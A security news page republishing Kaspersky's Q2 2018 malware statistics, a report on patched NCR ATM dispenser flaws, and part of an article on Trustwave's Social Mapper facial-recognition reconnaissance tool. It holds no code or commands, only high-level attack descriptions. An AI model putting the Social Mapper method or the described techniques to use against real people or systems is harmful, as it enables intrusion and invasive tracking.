English Articles - Úvod  Odborné èlánky  Bleskovky  Témata  List  EN  CZ  Seriály  Blogy  ÈlánkyCZ

Úvod  0  1  2  3  4  5  6  7  8  9  10  11  12  13  14  15  16  17  18  19  20  21  22  23  24  25  26  27  28  29  30  31  32  33  34  35  36  37  38  39  40

IT threat evolution Q2 2018. Statistics
10.8.2018 Kaspersky Analysis

Q2 figures
According to KSN:

Kaspersky Lab solutions blocked 962,947,023 attacks launched from online resources located in 187 countries across the globe.
351,913,075 unique URLs were recognized as malicious by Web Anti-Virus components.
Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 215,762 users.
Ransomware attacks were registered on the computers of 158,921 unique users.
Our File Anti-Virus logged 192,053,604 unique malicious and potentially unwanted objects.
Kaspersky Lab products for mobile devices detected:
1,744,244 malicious installation packages
61,045 installation packages for mobile banking Trojans
14,119 installation packages for mobile ransomware Trojans.
Mobile threats
General statistics
In Q2 2018, Kaspersky Lab detected 1,744,244 malicious installation packages, which is 421,666 packages more than in the previous quarter.

Number of detected malicious installation packages, Q2 2017 – Q2 2018

Distribution of detected mobile apps by type

Distribution of newly detected mobile apps by type, Q1 2018

Distribution of newly detected mobile apps by type, Q2 2018

Among all the threats detected in Q2 2018, the lion’s share belonged to potentially unwanted RiskTool apps (55.3%); compared to the previous quarter, their share rose by 6 p.p. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.

Second place was taken by Trojan-Dropper threats (13%), whose share fell by 7 p.p. Most detected files of this type came from the families Trojan-Dropper.AndroidOS.Piom and Trojan-Dropper.AndroidOS.Hqwar.

The share of advertising apps continued to decreased by 8%, accounting for 9% (against 11%) of all detected threats.

A remarkable development during the reporting period was that SMS Trojans doubled their share up to 8.5% in Q2 from 4.5% in Q1.

TOP 20 mobile malware
Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool or Adware.

Verdict %*
1 DangerousObject.Multi.Generic 70.04
2 Trojan.AndroidOS.Boogr.gsh 12.17
3 Trojan-Dropper.AndroidOS.Lezok.p 4.41
4 Trojan.AndroidOS.Agent.rx 4.11
5 Trojan.AndroidOS.Piom.toe 3.44
6 Trojan.AndroidOS.Triada.dl 3.15
7 Trojan.AndroidOS.Piom.tmi 2.71
8 Trojan.AndroidOS.Piom.sme 2.69
9 Trojan-Dropper.AndroidOS.Hqwar.i 2.54
10 Trojan-Downloader.AndroidOS.Agent.ga 2.42
11 Trojan-Dropper.AndroidOS.Agent.ii 2.25
12 Trojan-Dropper.AndroidOS.Hqwar.ba 1.80
13 Trojan.AndroidOS.Agent.pac 1.73
14 Trojan.AndroidOS.Dvmap.a 1.64
15 Trojan-Dropper.AndroidOS.Lezok.b 1.55
16 Trojan-Dropper.AndroidOS.Tiny.d 1.37
17 Trojan.AndroidOS.Agent.rt 1.29
18 Trojan.AndroidOS.Hiddapp.bn 1.26
19 Trojan.AndroidOS.Piom.rfw 1.20
20 Trojan-Dropper.AndroidOS.Lezok.t 1.19
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked.

As before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.04%), the verdict we use for malware detected using cloud technologies. In second place was Trojan.AndroidOS.Boogr.gsh (12.17%). This verdict is given to files recognized as malicious by our system based on machine learning. Third was Dropper.AndroidOS.Lezok.p (4.41%), followed by a close 0.3 p.p. margin by Trojan.AndroidOS.Agent.rx (4.11%), which was in the third position in Q1.

Geography of mobile threats

Map of attempted infections using mobile malware, Q2 2018

TOP 10 countries by share of users attacked by mobile malware:

Country* %**
1 Bangladesh 31.17
2 China 31.07
3 Iran 30.87
4 Nepal 30.74
5 Nigeria 25.66
6 India 25.04
7 Indonesia 24.05
8 Ivory Coast 23.67
9 Pakistan 23.49
10 Tanzania 22.38
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

In Q2 2018, Bangladesh (31.17%) topped the list by share of mobile users attacked. China (31.07%) came second with a narrow margin. Third and fourth places were claimed respectively by Iran (30.87%) and Nepal (30.74%).

Russia (8.34%) this quarter was down in 38th spot, behind Taiwan (8.48%) and Singapore (8.46%).

Mobile banking Trojans
In the reporting period, we detected 61,045 installation packages for mobile banking Trojans, which is 3.2 times more than in Q1 2018. The largest contribution was made by Trojan-Banker.AndroidOS.Hqwar.jck – this verdict was given to nearly half of detected new banking Trojans. Second came Trojan-Banker.AndroidOS.Agent.dq, accounting for about 5,000 installation packages.

Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018

TOP 10 mobile bankers

Verdict %*
1 Trojan-Banker.AndroidOS.Agent.dq 17.74
2 Trojan-Banker.AndroidOS.Svpeng.aj 13.22
3 Trojan-Banker.AndroidOS.Svpeng.q 8.56
4 Trojan-Banker.AndroidOS.Asacub.e 5.70
5 Trojan-Banker.AndroidOS.Agent.di 5.06
6 Trojan-Banker.AndroidOS.Asacub.bo 4.65
7 Trojan-Banker.AndroidOS.Faketoken.z 3.66
8 Trojan-Banker.AndroidOS.Asacub.bj 3.03
9 Trojan-Banker.AndroidOS.Hqwar.t 2.83
10 Trojan-Banker.AndroidOS.Asacub.ar 2.77
* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab’s mobile antivirus that were attacked by banking threats.

The most popular mobile banking Trojan in Q2 was Trojan-Banker.AndroidOS.Agent.dq (17.74%), closely followed by Trojan-Banker.AndroidOS.Svpeng.aj (13.22%). These two Trojans use phishing windows to steal information about user’s banking cards and online banking credentials. Besides, they steal money through abuse of SMS services, including mobile banking. The popular banking malware Trojan-Banker.AndroidOS.Svpeng.q (8.56%) took third place in the rating, moving one notch down from its second place in Q2.

Geography of mobile banking threats, Q2 2018

TOP 10 countries by share of users attacked by mobile banking Trojans

Country* %**
1 USA 0.79
2 Russia 0.70
3 Poland 0.28
4 China 0.28
5 Tajikistan 0.27
6 Uzbekistan 0.23
7 Ukraine 0.18
8 Singapore 0.16
9 Moldova 0.14
10 Kazakhstan 0.13
* Excluded from the rating are countries with relatively few users of Kaspersky Lab’s mobile antivirus (under 10,000).
** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country.

Overall, the rating did not see much change from Q1: Russia (0.70%) and USA (0.79%) swapped places, both remaining in TOP 3.

Poland (0.28%) rose from ninth to third place thanks to activation propagation of two Trojans: Trojan-Banker.AndroidOS.Agent.cw and Trojan-Banker.AndroidOS.Marcher.w. The latter was first detected in November 2017 and uses a toolset typical of banking malware: SMS interception, phishing windows and Device Administrator privileges to ensure its persistence in the system.

Mobile ransomware Trojans
In Q2 2018, we detected 14,119 installation packages for mobile ransomware Trojans, which is larger by half than in Q1.

Number of installation packages for mobile ransomware Trojans detected by Kaspersky Lab, Q2 2017 – Q2 2018

Verdict %*
1 Trojan-Ransom.AndroidOS.Zebt.a 26.71
2 Trojan-Ransom.AndroidOS.Svpeng.ag 19.15
3 Trojan-Ransom.AndroidOS.Fusob.h 15.48
4 Trojan-Ransom.AndroidOS.Svpeng.ae 5.99
5 Trojan-Ransom.AndroidOS.Egat.d 4.83
6 Trojan-Ransom.AndroidOS.Svpeng.snt 4.73
7 Trojan-Ransom.AndroidOS.Svpeng.ab 4.29
8 Trojan-Ransom.AndroidOS.Small.cm 3.32
9 Trojan-Ransom.AndroidOS.Small.as 2.61
10 Trojan-Ransom.AndroidOS.Small.cj 1.80
* Unique users attacked by this malware as a percentage of all users of Kaspersky Lab’s mobile antivirus attacked by ransomware Trojans.

The most popular mobile ransomware is Q2 was Trojan-Ransom.AndroidOS.Zebt.a (26.71%), encountered by more than a quarter of all users who got attacked by this type of malware. Second came Trojan-Ransom.AndroidOS.Svpeng.ag (19.15%), nudging ahead of once-popular Trojan-Ransom.AndroidOS.Fusob.h (15.48%).

Geography of mobile ransomware Trojans, Q2 2018

TOP 10 countries by share of users attacked by mobile ransomware Trojans

Country* %**
1 USA 0.49
2 Italy 0.28
3 Kazakhstan 0.26
4 Belgium 0.22
5 Poland 0.20
6 Romania 0.18
7 China 0.17
8 Ireland 0.15
9 Mexico 0.11
10 Austria 0.09
* Excluded from the rating are countries where the number of users of Kaspersky Lab’s mobile antivirus is relatively small (fewer than 10,000)
** Unique users in the country attacked by mobile ransomware Trojans as a percentage of all users of Kaspersky Lab’s mobile antivirus in the country.

First place in the TOP 10 went to the United States (0.49%); the most active family in this country was Trojan-Ransom.AndroidOS.Svpeng:

Verdict %*
1 Trojan-Ransom.AndroidOS.Svpeng.ag 53.53%
2 Trojan-Ransom.AndroidOS.Svpeng.ae 16.37%
3 Trojan-Ransom.AndroidOS.Svpeng.snt 11.49%
4 Trojan-Ransom.AndroidOS.Svpeng.ab 10.84%
5 Trojan-Ransom.AndroidOS.Fusob.h 5.62%
6 Trojan-Ransom.AndroidOS.Svpeng.z 4.57%
7 Trojan-Ransom.AndroidOS.Svpeng.san 4.29%
8 Trojan-Ransom.AndroidOS.Svpeng.ac 2.45%
9 Trojan-Ransom.AndroidOS.Svpeng.h 0.43%
10 Trojan-Ransom.AndroidOS.Zebt.a 0.37%
* Unique users in USA attacked by this malware as a percentage of all users of Kaspersky Lab’s mobile antivirus in this country who were attacked by ransomware Trojans.

Italy (0.28%) came second among countries whose residents were attacked by mobile ransomware. In this country, most attacks were the work of Trojan-Ransom.AndroidOS.Zebt.a. Third place was claimed by Kazakhstan (0.63%), where Trojan-Ransom.AndroidOS.Small.cm was the most popular mobile ransomware.

Attacks on IoT devices
Judging by the data from our honeypots, brute forcing Telnet passwords is the most popular method of IoT malware self-propagation. However, recently there has been an increase in the number of attacks against other services, such as control ports. These ports are assigned services for remote control over routers – this feature is in demand e.g. with internet service providers. We have observed attempts to launch attacks on IoT devices via port 8291, which is used by Mikrotik RouterOS control service, and via port 7547 (TR-069), which was used, among other purposes, for managing devices in the Deutsche Telekom network.

In both cases the nature of attacks was much more sophisticated than plain brute force; in particular, they involved exploits. We are inclined to think that the number of such attacks will only grow in the future on the back of the following two factors:

Brute forcing a Telnet password is a low-efficiency strategy, as there is a strong competition between threat actors. Each few seconds, there are brute force attempts; once successful, the threat actor blocks such the access to Telnet for all other attackers.
After each restart of the device, the attackers have to re-infect it, thus losing part of the botnet and having to reclaim it in a competitive environment.
On the other hand, the first attacker to exploit a vulnerability will gain access to a large number of device, having spent minimum time.

Distribution of attacked services’ popularity by number of unique attacking devices, Q2 2018

Telnet attacks
The scheme of attack is as follows: the attackers find a victim device, check if Telnet port is open on it, and launch the password brute forcing routine. As many manufacturers of IoT devices neglect security (for instance, they reserve service passwords on devices and do not leave a possibility for the user to change them routinely), such attacks become successful and may affect entire lines of devices. The infected devices start scanning new segments of networks and infect new, similar devices or workstations in them.

Geography of IoT devices infected in Telnet attacks, Q2 2018

TOP 10 countries by shares of IoT devices infected via Telnet
Country %*
1 Brazil 23.38
2 China 17.22
3 Japan 8.64
4 Russia 7.22
5 USA 4.55
6 Mexico 3.78
7 Greece 3.51
8 South Korea 3.32
9 Turkey 2.61
10 India 1.71
* Infected devices in each specific country as a percentage of all IoT devices that attack via Telnet.

In Q2, Brazil (23.38%) took the lead in the number of infected devices and, consequently, in the number of Telnet attacks. Next came China (17.22%) by a small margin, and third came Japan (8.64%).

In these attacks, the threat actors most often downloaded Backdoor.Linux.Mirai.c (15.97%) to the infected devices.

TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks
Verdict %*
1 Backdoor.Linux.Mirai.c 15.97
2 Trojan-Downloader.Linux.Hajime.a 5.89
3 Trojan-Downloader.Linux.NyaDrop.b 3.34
4 Backdoor.Linux.Mirai.b 2.72
5 Backdoor.Linux.Mirai.ba 1.94
6 Trojan-Downloader.Shell.Agent.p 0.38
7 Trojan-Downloader.Shell.Agent.as 0.27
8 Backdoor.Linux.Mirai.n 0.27
9 Backdoor.Linux.Gafgyt.ba 0.24
10 Backdoor.Linux.Gafgyt.af 0.20
*Proportion of downloads of each specific malware program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks

SSH attacks
Such attacks are launched similarly to Telnet attacks, the only difference being that they require to bots to have an SSH client installed on them to brute force credentials. The SSH protocol is cryptographically protected, so brute forcing passwords require large computational resources. Therefore, self-propagation from IoT devices is inefficient, and full-fledged servers are used to launch attacks. The success of an SSH attack hinges on the device owner or manufacturers’ faults; in other words, these are again weak passwords or preset passwords assigned by the manufacturer to an entire line of devices.

China took the lead in terms of infected devices attacking via SSH. Also, China was second in terms of infected devices attacking via Telnet.

Geography of IoT devices infected in SSH attacks, Q2 2018

TOP 10 countries by shares of IoT devices attacked via SSH
Country %*
1 China 15.77%
2 Vietnam 11.38%
3 USA 9.78%
4 France 5.45%
5 Russia 4.53%
6 Brazil 4.22%
7 Germany 4.01%
8 South Korea 3.39%
9 India 2.86%
10 Romania 2.23%
*The proportion of infected devices in each country as a percentage of all infected IoT devices attacking via SSH

Online threats in the financial sector
Q2 events
New banking Trojan DanaBot
The Trojan DanaBot was detected in May. It has a modular structure and is capable of loading extra modules with which to intercept traffic, steal passwords and crypto wallets – generally, a standard feature set for this type of a threat. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojans’ main body. DanaBot initially targeted Australian users and financial organizations, however in early April we noticed that it had become active against the financial organizations in Poland.

The peculiar BackSwap technique
The banking Trojan BackSwap turned out much more interesting. A majority of similar threats including Zeus, Cridex and Dyreza intercept the user’s traffic either to inject malicious scripts into the banking pages visited by the victim or to redirect it to phishing sites. By contrast, BackSwap uses an innovative technique for injecting malicious scripts: using WinAPI, it emulates keystrokes to open the developer console in the browser, and then it uses this console to inject malicious scripts into web pages. In a later version of BackSwap, malicious scripts are injected via the address bar, using JavaScript protocol URLs.

Carbanak gang leader detained
On March 26, Europol announced the arrest of a leader of the cybercrime gang behind Carbanak and Cobalt Goblin. This came as a result of a joint operation between Spain’s national police, Europol and FBI, as well as Romanian, Moldovan, Belorussian and Taiwanese authorities and private infosecurity companies. It was expected that the leader’s arrest would reduce the group’s activity, however recent data show that no appreciable decline has taken place. In May and June, we detected several waves of targeted phishing against banks and processing companies in Eastern Europe. The email writers from Carbanak masquerades as support lines of reputable anti-malware vendors, European Central Bank and other organizations. Such emails contained attached weaponized documents exploiting vulnerabilities CVE-2017-11882 and CVE-2017-8570.

Ransomware Trojan uses Doppelgänging technique
Kaspersky Lab experts detected a case of the ransomware Trojan SynAck using the Process Doppelgänging technique. Malware writers use this complex technique to make it stealthier and complicate its detection by security solutions. This was the first case when it was used in a ransomware Trojan.

Another remarkable event was the Purga (aka Globe) cryptoware propagation campaign, during which this cryptoware, alongside with other malware including a banking Trojan, was loaded to computers infected with the Trojan Dimnie.

General statistics on financial threats
These statistics are based on detection verdicts of Kaspersky Lab products received from users who consented to provide statistical data.

In Q2 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 215,762 users.

Number of unique users attacked by financial malware, Q2 2018

Geography of attacks

Geography of banking malware attacks, Q2 2018

TOP 10 countries by percentage of attacked users
Country* % of users attacked**
1 Germany 2.7%
2 Cameroon 1.8%
3 Bulgaria 1.7%
4 Greece 1.6%
5 United Arab Emirates 1.4%
6 China 1.3%
7 Indonesia 1.3%
8 Libya 1.3%
9 Togo 1.3%
10 Lebanon 1.2%
These statistics are based on Anti-Virus detection verdicts received from users of Kaspersky Lab products who consented to provide statistical data.

*Excluded are countries with relatively few Kaspersky Lab’ product users (under 10,000).
** Unique Kaspersky Lab users whose computers were targeted by banking Trojans or ATM/PoS malware as a percentage of all unique users of Kaspersky Lab products in the country.

TOP 10 banking malware families
Name Verdicts* % of attacked users**
1 Nymaim Trojan.Win32. Nymaim 27.0%
2 Zbot Trojan.Win32. Zbot 26.1%
3 SpyEye Backdoor.Win32. SpyEye 15.5%
4 Emotet Backdoor.Win32. Emotet 5.3%
5 Caphaw Backdoor.Win32. Caphaw 4.7%
6 Neurevt Trojan.Win32. Neurevt 4.7%
7 NeutrinoPOS Trojan-Banker.Win32.NeutrinoPOS 3.3%
8 Gozi Trojan.Win32. Gozi 2.0%
9 Shiz Backdoor.Win32. Shiz 1.5%
10 ZAccess Backdoor.Win32. ZAccess 1.3%
* Detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique users attacked by this malware as a percentage of all users attacked by financial malware.

In Q2 2018, the general makeup of TOP 10 stayed the same, however there were some changes in the ranking. Trojan.Win32.Zbot (26.1%) and Trojan.Win32.Nymaim (27%) remain in the lead after swapping positions. The banking Trojan Emotet ramped up its activity and, accordingly, its share of attacked users from 2.4% to 5.3%. Conversely, Caphaw dramatically downsized its activity to only 4.7% from 15.2% in Q1, taking fifth position in the rating.

Cryptoware programs
Number of new modifications
In Q2, we detected 7,620 new cryptoware modifications. This is higher than in Q1, but still well below last year’s numbers.

Number of new cryptoware modifications, Q2 2017 – Q2 2018

Number of users attacked by Trojan cryptors
In Q2 2018, Kaspersky Lab products blocked cryptoware attacks on the computers of 158,921 unique users. Our statistics show that cybercriminals’ activity declined both against Q1 and on a month-on-month basis during Q2.

Number of unique users attacked by cryptors, Q2 2018

Geography of attacks

TOP 10 countries attacked by Trojan cryptors
Country* % of users attacked by cryptors**
1 Ethiopia 2.49
2 Uzbekistan 1.24
3 Vietnam 1.21
4 Pakistan 1.14
5 Indonesia 1.09
6 China 1.04
7 Venezuela 0.72
8 Azerbaijan 0.71
9 Bangladesh 0.70
10 Mongolia 0.64
* Excluded are countries with relatively few Kaspersky Lab users (under 50,000).
** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in the country.

The list of TOP 10 countries in Q2 is practically identical to that in Q1. However, some place trading occurred in TOP 10: Ethiopia (2.49%) pushed Uzbekistan (1.24%) down from first to second place, while Pakistan (1.14%) rose to fourth place. Vietnam (1.21%) remained in third position, and Indonesia (1.09%) remained fifth.

TOP 10 most widespread cryptor families
Name Verdicts* % of attacked users**
1 WannaCry Trojan-Ransom.Win32.Wanna 53.92
2 GandCrab Trojan-Ransom.Win32.GandCrypt 4.92
3 PolyRansom/VirLock Virus.Win32.PolyRansom 3.81
4 Shade Trojan-Ransom.Win32.Shade 2.40
5 Crysis Trojan-Ransom.Win32.Crusis 2.13
6 Cerber Trojan-Ransom.Win32.Zerber 2.09
7 (generic verdict) Trojan-Ransom.Win32.Gen 2.02
8 Locky Trojan-Ransom.Win32.Locky 1.49
9 Purgen/GlobeImposter Trojan-Ransom.Win32.Purgen 1.36
10 Cryakl Trojan-Ransom.Win32.Cryakl 1.04
* Statistics are based on detection verdicts of Kaspersky Lab products. The information was provided by Kaspersky Lab product users who consented to provide statistical data.
** Unique Kaspersky Lab users attacked by a particular family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors.

WannaCry further extends lead over other cryptor families, its share rising to 53.92% from 38.33% in Q1. Meanwhile, the cybercriminals behind GandCrab (4.92%, emerged only in Q1 2018) put so much effort into its distribution that it rose all the way up to second place in this TOP 10, displacing the polymorphic worm PolyRansom (3.81%). The remaining positions, just like in Q1, are occupied by the long-familiar cryptors Shade, Crysis, Purgen, Cryakl etc.

As we already reported in Ransomware and malicious cryptominers in 2016-2018, ransomware is shrinking progressively, and cryptocurrency miners is starting to take its place. Therefore, this year we decided to begin to publish quarterly reports on the situation around type of threats. Simultaneously, we began to use a broader range of verdicts as a basis for collecting statistics on miners, so the Q2 statistics may not be consistent with the data from our earlier publications. It includes both stealth miners which we detect as Trojans, and those which are issued the verdict ‘Riskware not-a-virus’.

Number of new modifications
In Q2 2018, Kaspersky Lab solutions detected 13,948 new modifications of miners.

Number of new miner modifications, Q2 2018

Number of users attacked by cryptominers
In Q2, we detected attacks involving mining programs on the computers of 2,243,581 Kaspersky Lab users around the world.

Number of unique users attacked by cryptominers, Q2 2018

In April and May, the number of attacked users stayed roughly equal, and in June there was a modest decrease in cryptominers’ activity.

Geography of attacks

Geography of cryptominer attacks, Q2 2018

TOP 10 countries by percentage of attacked users
Country* % of attacked users**
1 Ethiopia 17.84
2 Afghanistan 16.21
3 Uzbekistan 14.18
4 Kazakhstan 11.40
5 Belarus 10.47
6 Indonesia 10.33
7 Mozambique 9.92
8 Vietnam 9.13
9 Mongolia 9.01
10 Ukraine 8.58
*Excluded are countries with relatively few Kaspersky Lab’ product users (under 50,000).
** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country.

Vulnerable apps used by cybercriminals
In Q2 2018, we again observed some major changes in the distribution of platforms most often targeted by exploits. The share of Microsoft Office exploits (67%) doubled compared to Q1 (and quadrupled compared with the average for 2017). Such a sharp growth was driven primarily by massive spam messages distributing documents containing an exploit to the vulnerability CVE-2017-11882. This stack overflow-type vulnerability in the old, deprecated Equation Editor component existed in all versions of Microsoft Office released over the last 18 years. The exploit still works stably in all possible combinations of the Microsoft Office package and Microsoft Windows. On the other hand, it allows the use of various obfuscations for bypassing the protection. These two factors made this vulnerability the most popular tool in cybercriminals’ hands in Q2. The shares of other Microsoft Office vulnerabilities did no undergo much change since Q1.

Q2 KSN statistics also showed a growing number of Adobe Flash exploits exploited via Microsoft Office. Despite Adobe and Microsoft’s efforts to obstruct exploitation of Flash Player, a new 0-day exploit CVE-2018-5002 was discovered in Q2. It propagated in an XLSX file and used a little-known technique allowing the exploit to be downloaded from a remote source rather than carried in the document body. Shockwave Flash (SWF) files, like many other file formats, are rendered in Microsoft Office documents in the OLE (Object Linking and Embedding) format. In the case of a SWF file, the OLE object contains the actual file and a list of various properties, one of which points to the path to the SWF file. The OLE object in the discovered exploit did not contain an SWF file in it, but only carried a list of properties including a web link to the SWF file, which forced Microsoft Office to download the missing file from the provided link.

Distribution of exploits used in cybercriminals’ attacks by types of attacked applications, Q2 2018

In late March 2018, a PDF document was detected at VirusTotal that contained two 0-day vulnerabilities: CVE-2018-4990 and CVE-2018-8120. The former allowed for execution of shellcode from JavaScript via exploitation of a software error in JPEG2000 format image processor in Acrobat Reader. The latter existed in the win32k function SetImeInfoEx and was used for further privilege escalation up to SYSTEM level and enabled the PDF viewer to escape the sandbox. Ana analysis of the document and our statistics show that at the moment of uploading to VirusTotal, this exploit was at the development stage and was not used for in-the-wild attacks.

In late April, Kaspersky Lab experts using an in-house sandbox have found the 0-day vulnerability CVE-2018-8174 in Internet Explorer and reported it to Microsoft. An exploit to this vulnerability used a technique associated with CVE-2017-0199 (launching an HTA script from a remote source via a specially crafted OLE object) to exploit a vulnerable Internet Explorer component with the help of Microsoft Office. We are observing that exploit pack creators have already taken this vulnerability on board and actively distribute exploits to it both via web sites and emails containing malicious documents.

Also in Q2, we observed a growing number of network attacks. There is a growing share of attempts to exploit the vulnerabilities patched with the security update MS17-010; these make up a majority a of the detected network attacks.

Attacks via web resources
The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are specially created by cybercriminals; web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected.

Top 10 countries where online resources are seeded with malware
The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established.

In the second quarter of 2018, Kaspersky Lab solutions blocked 962,947,023 attacks launched from web resources located in 187 countries around the world. 351,913,075 unique URLs were recognized as malicious by web antivirus components.

Distribution of web attack sources by country, Q2 2018

In Q2, the TOP 4 of web attack source countries remain unchanged. The US (45.87%) was home to most sources of web attacks. The Netherlands (25.74%) came second by a large margin, Germany (5.33%) was third. There was a change in the fifth position: Russia (1.98%) has displaced the UK, although its share has decreased by 0.55 p.p.

Countries where users faced the greatest risk of online infection
To assess the risk of online infection faced by users in different countries, for each country we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.

This rating only includes attacks by malicious programs that fall under the Malware class; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Belarus 33.49
2 Albania 30.27
3 Algeria 30.08
4 Armenia 29.98
5 Ukraine 29.68
6 Moldova 29.49
7 Venezuela 29.12
8 Greece 29.11
9 Kyrgyzstan 27.25
10 Kazakhstan 26.97
11 Russia 26.93
12 Uzbekistan 26.30
13 Azerbaijan 26.12
14 Serbia 25.23
15 Qatar 24.51
16 Latvia 24.40
17 Vietnam 24.03
18 Georgia 23.87
19 Philippines 23.85
20 Romania 23.55
These statistics are based on detection verdicts returned by the Web Anti-Virus module that were received from users of Kaspersky Lab products who consented to provide statistical data.
Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users targeted by Malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country.

Geography of malicious web attacks in Q2 2018 (percentage of attacked users)

On average, 19.59% of Internet user computers worldwide experienced at least one Malware-class web attack.

Local threats
Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.).

Data in this section is based on analyzing statistics produced by Anti-Virus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media.

In Q2 2018, our File Anti-Virus detected 192,053,604 malicious and potentially unwanted objects.

Countries where users faced the highest risk of local infection
For each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.

The rating includes only Malware-class attacks. It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.

Country* % of attacked users**
1 Uzbekistan 51.01
2 Afghanistan 49.57
3 Tajikistan 46.21
4 Yemen 45.52
5 Ethiopia 43.64
6 Turkmenistan 43.52
7 Vietnam 42.56
8 Kyrgyzstan 41.34
9 Rwanda 40.88
10 Mongolia 40.71
11 Algeria 40.25
12 Laos 40.18
13 Syria 39.82
14 Cameroon 38.83
15 Mozambique 38.24
16 Bangladesh 37.57
17 Sudan 37.31
18 Nepal 37.02
19 Zambia 36.60
20 Djibouti 36.35
These statistics are based on detection verdicts returned by OAS and ODS Anti-Virus modules received from users of Kaspersky Lab products who consented to provide statistical data. The data include detections of malicious programs located on user computers or removable media connected to computers, such as flash drives, camera and phone memory cards, or external hard drives.
Excluded are countries with relatively few Kaspersky Lab users (under 10,000).
** Unique users on whose computers Malware-class local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.

Geography of malicious web attacks in Q2 201 (ranked by percentage of users attacked)

On average, 19.58% of computers globally faced at least one Malware-class local threat in Q2.

Flaws in ATM Dispenser Controllers Allowed Hackers to Steal Cash
10.8.2018 securityweek

ATM hacking exploits cash dispenser controller vulnerabilities

Researchers have disclosed the details of two serious vulnerabilities affecting ATM currency dispensers made by NCR. The flaws have been patched, but they could have been exploited to install outdated firmware and get ATMs to dispense cash.

Positive Technologies experts Vladimir Kononovich and Alexey Stennikov have conducted a successful black box attack against the NCR S1 and S2 cash dispenser controllers. In these types of attacks, the attacker only sees inputs and outputs, without having any knowledge of the system’s internal workings.

The method, which the researchers described as a “logical attack,” requires physical access to the targeted device. In this particular case, an attacker could have leveraged the poor physical security of the targeted dispenser controller to connect to it, install vulnerable firmware, and issue commands that would instruct the machine to dispense cash.

The experts disclosed their findings this week at the Black Hat security conference in Las Vegas.

Two different security holes have been found that allow an attacker to roll back the firmware to an older, vulnerable version.

One of them is CVE-2017-17668, which affects the S1 controller, and the other is CVE-2018-5717, which affects the S2 controller.

The flaws are similar and they are both related to insufficient protection of the memory write mechanism. They can be exploited by an unauthenticated attacker to execute arbitrary code, bypass the firmware anti-rollback mechanism, and install firmware containing known vulnerabilities, according to Positive Technologies.

“Our research indicated that not all requests from the ATM computer to the dispenser were encrypted. Instead, encryption was applied only to requests deemed critical by the manufacturer, such as dispensing cash. But some of the so-called non-critical requests can be just as dangerous,” said Alexey Stennikov, Head of Hardware Security Analysis at Positive Technologies.

The researchers notified NCR of their findings and the vendor released critical firmware updates in February that should provide better protection against black box attacks. The update should address the firmware rollback vulnerability and it adds an extra layer of protection for physical authentication mechanisms.

“The physical authentication mechanism used to authorize encrypted communications to the dispenser has been strengthened to add protection against an attacker using endoscope technology in an attempt to manipulate dispenser electronics from outside the safe. Additionally, further authentication mechanisms have been added as configuration options,” NCR said in its advisory.

Social Mapper – Correlate social media profiles with facial recognition
10.8.2018 securityaffairs

Trustwave developed Social Mapper an Open Source Tool that uses facial recognition to correlate social media profiles across different social networks.
Security experts at Trustwave have released Social Mapper, a new open-source tool that allows finding a person of interest across social media platform using facial recognition technology.

The tool was developed to gather intelligence from social networks during penetration tests and are aimed at facilitating social engineering attacks.

Social Mapper facial recognition tool automatically searches for targets across eight social media platforms, including Facebook, Instagram, Twitter, LinkedIn, Google+, VKontakte (The Russian Facebook), and Chinese Weibo and Douban.

An individual could be searcher by providing a name and a picture, the tool allows to conduct an analysis “on a mass scale with hundreds or thousands of individuals” at once.

“Performing intelligence gathering is a time-consuming process, it typically starts by attempting to find a person’s online presence on a variety of social media sites. While this is a easy task for a few, it can become incredibly tedious when done at scale.” Trustwave states in a blog post.

“Introducing Social Mapper an open source intelligence tool that uses facial recognition to correlate social media profiles across a number of different sites on a large scale. Trustwave, which provides ethical hacking services, has successfully used the tool in a number of penetration tests and red teaming engagements on behalf of clients.”

Social Mapper

The Social Mapper search for specific profiles in three stages:

Stage 1—The tool creates a list of targets based on the input you give it. The list can be provided via links in a CSV file, images in a folder or via people registered to a company on LinkedIn.

Stage 2—Once the targets are processed, the second stage of Social Mapper kicks in that automatically starts searching social media sites for the targets online.

